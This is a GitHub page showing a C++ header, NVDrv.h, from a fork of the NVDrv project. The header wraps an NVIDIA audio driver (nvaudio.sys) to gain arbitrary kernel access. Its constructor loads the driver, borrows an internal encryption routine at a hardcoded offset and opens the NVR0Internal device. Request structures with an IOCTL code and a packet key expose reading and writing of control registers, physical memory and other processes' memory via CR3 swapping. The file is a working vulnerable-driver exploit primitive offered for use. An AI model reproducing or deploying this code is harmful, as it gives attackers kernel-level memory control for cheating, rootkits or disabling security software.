forked from zer0condition/NVDrv
/
NVDrv.h
150 lines (122 loc) · 4 KB
/
NVDrv.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
#pragma once
#include <Windows.h>
#include <iostream>
#include <tlhelp32.h>
struct NVDrv
{
public:
DWORD ReadCr(int cr);
BOOL WriteCr(int cr, DWORD64 value);
std::wstring GetProcessPath(const std::wstring& processName);
uintptr_t GetProcessBase(const std::wstring& processName);
uintptr_t GetProcessCR3(uintptr_t base_address);
uintptr_t GetSystemCR3();
uintptr_t MmGetPhysicalAddress(uintptr_t virtual_address);
uintptr_t TranslateLinearToPhysicalAddress(uintptr_t virtual_address);
BOOL ReadPhysicalMemory(uintptr_t physical_address, void* OUT res, int size);
BOOL WritePhysicalMemory(uintptr_t physical_address, void* IN res, int size);
BOOL ReadVirtualMemory(uintptr_t address, LPVOID output, unsigned long size);
BOOL WriteVirtualMemory(uintptr_t address, LPVOID data, unsigned long size);
BOOL SwapReadContext(uintptr_t target_cr3);
NVDrv()
{
HMODULE nvaudio = LoadLibraryW(L"C:\\nvaudio.sys");
if (!nvaudio)
{
printf("nvaudio.sys not found at C: directory!\n");
exit(5000);
}
encrypt_payload = (decltype(encrypt_payload))(__int64(nvaudio) + 0x2130);
this->nvhandle = CreateFileW(L"\\\\.\\NVR0Internal", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL);
if (this->nvhandle != INVALID_HANDLE_VALUE) {
printf("NVR0Internal Handle: %p\n", this->nvhandle);
}
else {
printf("Driver is not loaded!\n");
exit(5000);
}
}
template<typename T>
T Read(uintptr_t address)
{
T buffer;
if (!ReadVirtualMemory(address, &buffer, sizeof(T)))
return NULL;
return buffer;
}
template<typename T>
BOOL Write(uintptr_t address, T val)
{
if (!WriteVirtualMemory(address, (LPVOID)&val, sizeof(T)))
return FALSE;
return TRUE;
}
enum NVControlRegisters {
CR0 = 0,
CR2 = 2,
CR3 = 3,
CR4 = 4
};
private:
#define DEBUG TRUE
static int constexpr ioctl_code = 0x9C40A484;
enum class NVFunction : int
{
read_cr = 0,
write_cr = 1,
phys_req = 0x26,
phys_read = 0x14,
phys_write = 0x15
};
struct request { };
struct request_memcpy : request
{
NVFunction request_id;
int size;
__int64 dst_addr;
__int64 src_addr;
char unk[0x20];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_phys_addr : request
{
NVFunction request_id;
int unk_0;
__int64 result_addr;
__int64 virtual_addr;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_readcr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int result;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8] = { 12868886329971960498, 13552922889676271240, 10838534925730813900, 11819403095038824665,16047435637536096 ,10679697536739367056 ,18271467892729589711 ,6472933704646412218 };;
char unk_data[0x138 - 0x40 - 56];
};
struct request_writecr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
void* (*encrypt_payload)(request* data_crypt, int, void* temp_buf) = nullptr;
HANDLE nvhandle = INVALID_HANDLE_VALUE;
uintptr_t target_cr3 = 0;
};